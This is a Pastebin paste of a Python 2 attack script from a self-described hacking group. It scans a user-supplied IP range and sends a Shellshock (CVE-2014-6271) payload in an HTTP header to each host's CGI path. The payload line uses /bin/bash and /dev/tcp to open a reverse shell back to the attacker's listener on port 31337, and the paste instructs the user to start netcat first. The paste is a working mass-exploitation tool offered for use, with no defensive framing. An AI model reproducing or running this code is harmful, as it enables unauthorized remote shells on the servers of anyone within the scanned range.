API tools faq
paste
3xploit3r

ShellShock.py Reverse TCP

3xploit3r
Aug 5th, 2016
181
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.82 KB | None | 0 0
raw download clone embed print report diff
  1. We are...
  2. _____ _________
  3. / _ \ ____ ____ ____ / _____/ ____ ____
  4. / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\
  5. / | \ | ( <_> ) | \/ \ ___/\ \___
  6. \____|__ /___| /\____/|___| /_______ /\___ >\___ >
  7. \/ \/ \/ \/ \/ \/
  8. //Laughing at your security since 2012*
  9. =================================================================================================
  10. Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - 4prili666h05t - Hannaichi - ap3x h4x0r
  11. - Gh05tFr3ak - xCyb3r 3vil7 - Hassouna Khalil - spider64
  12. =================================================================================================
  13.  
  14. # \!/ Enter your No-Ip address or other listening address in line 57 \!/
  15. # \!/ Launch nc -l 31337 before executing script! \!/
  16. # Dont forgets to update bash so you donts get PWNed while "testing"... lol
  17. # yum -y update bash; apt-get -y update bash; reboot
  18. # (Script is coded in python2.7, errors running with python3.0)
  19.  
  20. import httplib,urllib
  21.  
  22. print "###########################################################"
  23. print "### ShellShock.py ###"
  24. print "### Bash 0-day Environment Variable Injector ###"
  25. print "### CVE-2014-6271 ###"
  26. print "### *************************************************** ###"
  27. print "### ###"
  28. print "### It's either shell or be shelled ###"
  29. print "### ###"
  30. print "### _.-''|''-._ ###"
  31. print "### .-' | `-. ###"
  32. print "### .'\ | /`. ###"
  33. print "### .' \ | / `. ###"
  34. print "### \ \ | / / ###"
  35. print "### `\ \ | / /' ###"
  36. print "### `\ \ | / /' ###"
  37. print "### `\ \ | / /' ###"
  38. print "### _.-`\ \ | / /'-._ ###"
  39. print "### {_____`\\|//'______} ###"
  40. print "### `-' ###"
  41. print "### ###"
  42. print "### twitter.com/_d3f4ult ###"
  43. print "###########################################################"
  44. print "\n"
  45. print '\t\!/ Reverse shell returned on port 31337 \!/\n'
  46. print '\t Enter The First Three IP ranges To Scan \n'
  47. url = raw_input(" [Example : 123.456.789] : ")
  48. finput = input("Enter the Starting IP of Range to Scan : ")
  49. sinput = input("Enter the Ending IP of Range to Scan for : ")
  50. print
  51.  
  52. path = raw_input("Enter Vuln CGI Path : ")
  53.  
  54. for x in range(finput,sinput + 1):
  55. murl = url + "." + str(x)
  56. conn = httplib.HTTPConnection(murl)
  57. reverse_shell='() { :; }; /bin/bash -i >& /dev/tcp/NO-IP/31337 0>&1'
  58. headers = {"Content-type": "application/x-www-form-urlencoded",
  59. "test": reverse_shell}
  60. conn.request("GET",path,headers=headers)
  61. res = conn.getresponse()
  62.  
  63. if str(res.status) == '200':
  64. print "[+] Website Present and Payload Successfully Sent To " + murl + path
  65. data = res.read()
  66. print data
  67. else:
  68. print "[!]" + murl + path + " Is Not Vulnerable."
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!